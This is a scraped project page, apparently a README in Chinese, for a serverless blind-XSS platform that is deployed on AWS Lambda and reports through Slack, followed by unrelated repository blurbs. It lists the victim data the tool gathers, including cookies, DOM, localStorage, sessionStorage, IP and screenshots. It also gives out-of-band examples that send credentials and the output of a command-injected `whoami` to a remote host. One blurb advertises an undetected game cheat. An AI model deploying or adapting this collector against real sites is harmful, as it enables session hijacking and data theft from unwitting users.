The AWS Lambda Serverless Blind XSS App

Related tags

Third-party APIs Wrappersass
Overview

Ass

The AWS Lambda Serverless Blind XSS App

利用VPS配置XSS平台太麻烦了,如果利用AWS的Lambda那不就是一个域名的事情么?剩下的环境配置、HTTPS证书、隐私性、VPS续费都不用管了, 所以根据xless重写了Lambda平台的XSS,利用slack机器人通知的方式代替邮件或者短信

XSS有四个URL可用,部署的时候建议修改不同的地址:

⚠️ 准备工作

  • AWS账号
  • Slack账号,包括一个slack App的通知机器人和上传图片需要的Auth Token
  • 自定义域名(可选)

🚀 部署

Slack

创建Slack的App,创建之后点进APP获取webhook和Token, webhook使用来通知机器人,Token可以使用xoxb开头的OAuth token,用于上传图片:

slack.png

AWS Lambda

部署Lambda

修改app.pyToken,Bot为你自己的信息:

virtualenv venv -p python3
. venv/bin/activate
sls plugin install -n serverless-wsgi
sls plugin install -n serverless-python-requirements
sls deploy #部署到aws
sls wsgi serve #本地测试
绑定自定义域名

首先在域名提供商更改ns的地址,使用Route 53服务管理域名,设置自定义域名步骤:how-to-edge-optimized-custom-domain-name,总结来说如下:

  1. 在API Gateway增加自定义域名,选择 Edge-optimized,在API映射选择创建好的lambda函数
  2. 为域名配置ACM证书
  3. 配置好之后得到一个*.cloudfront.net格式的域名
  4. 在Route 53设置cname别名,cloudflare家不支持

📨 收集的信息

  • Cookies
  • User-Agent
  • HTTP Referrer
  • Browser DOM
  • Browser Time
  • Document Location
  • Origin
  • LocalStorage
  • SessionStorage
  • IP Address
  • Screenshot

xss.png

📡 Out-of-Band (OOB)

OOB场景1

在网站插入JS获取敏感信息传输到远程服务器,注意使用JSON格式:

http https://example.com/msg "UserName=admin" "Password=admin"  -v

oob

OOB场景2

命令执行外带到远程http服务:

http https://example.com/404/`whoami`

oob

TODO

  • 每次需要改JS的时候需要重新部署Lambda
Owner
cocokey
cocokey
GitHub Repository
Python SDK for 42DI

42di Python SDK Install pip install git+https://github.com/42di/python-sdk import import di #42di import pandas_datareader as pdr Init SDK project =

42DI 2 Nov 03, 2021
Fully undetected auto skillcheck hack for dead by daylight that works decently well

Auto-skillcheck was made by Love ❌ code ✅ ❔ ・How to use Start off by installing python ofc Open cmd in the same directory and type pip install -r requ

Rdimo 10 Aug 13, 2022
1.本项目采用Python Flask框架开发提供(应用管理,实例管理,Ansible管理,LDAP管理等相关功能)

op-devops-api 1.本项目采用Python Flask框架开发提供(应用管理,实例管理,Ansible管理,LDAP管理等相关功能) 后端项目配套前端项目为:op-devops-ui jenkinsManager 一.插件python-jenkins bug修复 (1).插件版本 pyt

3 Nov 12, 2021
Twitter FakeNFT With Python

This project is a server that fetches your Twitter profile picture and applies the hexagonal transparency mask displayed on the profiles of users who have an NFT profile picture.

Mathis HAMMEL 29 Apr 23, 2022
"zpool iostats" for humans; find the slow parts of your ZFS pool

Getting the gist of zfs statistics vpool-demo.mp4 The ZFS command "zpool iostat" provides a histogram listing of how often it takes to do things in pa

Chad 57 Oct 24, 2022
A simple discord bot that generates facts!

fact-bot A simple discord bot that generates facts! How to make a bot Go to https://discord.com/developers/applications Then click on 'New Application

1 Jan 05, 2022
Python wrapper for the Sportradar APIs ⚽️🏈

Sportradar APIs This is a Python wrapper for the sports APIs provided by Sportradar. You'll need to sign up for an API key to use the service. Sportra

John W. Miller 39 Jan 01, 2023
A discord bot that autobans blacklisted users by ID and Names

AutoBan A discord bot that autobans blacklisted users by ID and Names Getting Started Dependencies disnake @ git+https://github.com/DisnakeDev/disnake

Jason Martin 0 Oct 02, 2022
My homeserver setup. Everything managed securely using Portainer.

homeserver-traefik-portainer Features: access all services with free TLS from letsencrypt using your own domain running a side project is super simple

Tomasz Wójcik 44 Jan 03, 2023
Discord Bot for League of Legends live match tracker

SABot Dicord Bot for League of Legends match auto tracker Features: Search Summoners statistics in League of Legends. Auto-notifications provide when

Jungyu Choi 4 Sep 27, 2022
Access LeetCode problems via id

LCid - access LeetCode problems via id Introduction As a world's leading online programming learning platform, LeetCode is quite popular among program

bunnyxt 14 Oct 08, 2022
Tweet stream in OBS browser source

Tweetron TweetronはOBSブラウザーソースを使用してツイートを画面上に表示するツールソフトです Windowsのみ対応 (Windows10動作確認済) ダウンロード こちらから最新版をダウンロードしてください (現在ベータテスト版を配布しています) Download ver0.0.

Cube 0 Apr 05, 2022
Instagram Story View Bot Unencrypted Story Views is a helpful tool that allows thousands of people to watch your posts. It is completely free, source is visible for anyone to modify Type your username, wait for the bot to Automate the Task.

Ιnstagram Story Viewer Bot Usage I made this script under 10 minutes, the idea is to get Unlimited Story Views by Looping the "Submit Button" Update x

4 Oct 28, 2021
Modern Desktop Jellyfin Client written in Python and Vue for the UI [WIP]

JellyPlayer Modern Jellyfin Client Installation Install Requirements: Install Python 3 Install dependencies Install node deps for frontend, go to Jell

Prayag Prajapati 57 Dec 12, 2022
A file-based quote bot written in Python

Let's Write a Python Quote Bot! This repository will get you started with building a quote bot in Python. It's meant to be used along with the Learnin

1 Nov 01, 2021
GitPython is a python library used to interact with Git repositories.

Gitoxide: A peek into the future… I started working on GitPython in 2009, back in the days when Python was 'my thing' and I had great plans with it. O

3.8k Jan 03, 2023
A feishu bot daily push arxiv latest articles.

arxiv-feishu-bot We develop A simple feishu bot script daily pushes arxiv latest articles. His effect is as follows: Of course, you can also use other

huchi 6 Apr 06, 2022
Growtopia server_data.php reader with bypass method, using discord bot

Server_data.php-reader Growtopia server_data.php reader with bypass method, using discord bot How to use 1 install python 2 change your bot token

7 Jul 16, 2022
FTP Anonymous Login

FTPAnon FTP Anonymous Login Install git clone https://github.com/SiThuTuntimehacker/FTPAnon cd FTPAnon bash install.sh access ftp sever " ftpaccess.tx

SiThuTun 3 Mar 23, 2022
Discord Bot that can translate your text, count and reply to your messages with a personalised text

Discord Bot that can translate your text, count and reply to your messages with a personalised text

Grizz 2 Jan 26, 2022